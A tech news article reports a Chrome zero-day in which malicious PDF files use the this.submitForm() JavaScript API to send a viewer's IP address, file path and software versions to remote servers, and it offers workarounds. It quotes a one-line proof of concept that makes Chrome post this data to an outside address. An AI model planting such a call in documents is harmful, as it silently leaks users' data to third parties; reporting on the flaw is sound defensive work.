Chrome vulnerability lets hackers collect user data via PDF files

3 minute read
google chrome

Home » News » Chrome vulnerability lets hackers collect user data via PDF files

Exploit detection service EdgeSpot discovered an intriguing Chrome zero-day vulnerability exploiting PDF documents. The vulnerability allows attackers to harvest sensitive data using malicious PDF documents opened in Chrome. 

As soon as the victim opens the respective PDF files in Google Chrome, a malicious program starts working in the background by collecting user data.

The data is then forwarded to the remote server that is being controlled by the hackers. You might be wondering what data is being sucked by the attackers, they target the following data on your PC:

  • IP address
  • Full path of the PDF file on the system
  • OS and Chrome versions

Beware of malware-ridden PDF files

You might be surprised to know that nothing happens when Adobe Reader is used for opening PDF files. Additionally, HTTP POST requests are used to transfer data to the remote servers without any user intervention.

Experts spotted that one of the two domains readnotify[.]com or burpcollaborator[.]net was receiving the data.

You can imagine the intensity of the attack by considering the fact that most of the antivirus software is not able to detect the samples detected by EdgeSpot.

Experts reveal that the attackers are using the “this.submitForm()” PDF Javascript API to collect the sensitive information of the users.

We tested it with a minimal PoC, a simple API call like “this.submitForm(‘http://google.com/test’)” will make Google Chrome send the personal data to google.com.

The experts actually found out that this Chrome bug was being exploited by two distinct sets of malicious PDF files. Both of them were circulated in October 2017 and September 2018, respectively.

Notably, the collected data can be used by the attackers to fine-tune attacks in the future. Reports suggest that the first batch of files was compiled using ReadNotify’s PDF tracking service.

Users can utilize the service to keep track of user views.  EdgeSpot has not shared any details regarding the nature of the second set of PDF files.

How to Stay Protected


In case you want to be secure while surfing the internet, you will need to get a full-dedicated tool to secure your network.  Install now Cyberghost VPN and secure yourself. It protects your PC from attacks while browsing, masks your IP address and blocks all unwanted access.


The Exploit detection service EdgeSpot wanted to alert the users Chrome users about the potential risks because the patch is not expected to be released in the near future.

EdgeSpot reported to Google about the vulnerability last year and the company promised to release a patch late April. H

owever, you can consider using a temporary workaround to the problem by locally viewing the received PDF documents using an alternative PDF reader app.

Alternatively, you can also open your PDF documents in Chrome by disconnecting your systems from the Internet. Meanwhile, you can wait for the Chrome 74 update that is expected to be rolled out on April 23.

RELATED ARTICLES YOU NEED TO CHECK OUT:

Discussions

Next up

My printer and phone wont connect: 4 steps to fix it

Tashreef Shareef avatar. By: Tashreef Shareef
2 minute read

The modern wireless printers allow users to print using their phone and computer wirelessly. Sometimes, that dynamic duo might not work as printer and phone […]

Continue Reading

4 reliable share market software to keep track of your stocks

Vladimir Popescu avatar. By: Vladimir Popescu
Less than a 1 minute read

Because trading stocks is a hard area of business as it is, getting some help when it comes to coordination of stocks and help with […]

Continue Reading

Power BI visual errors? Fix them with our best solutions

Alexandru Voiculescu By: Alexandru Voiculescu
3 minute read

Visualization is crucial in Power BI. Therefore, this feature should run smoothly. But this is not always the case. Many users reported various visual errors […]

Continue Reading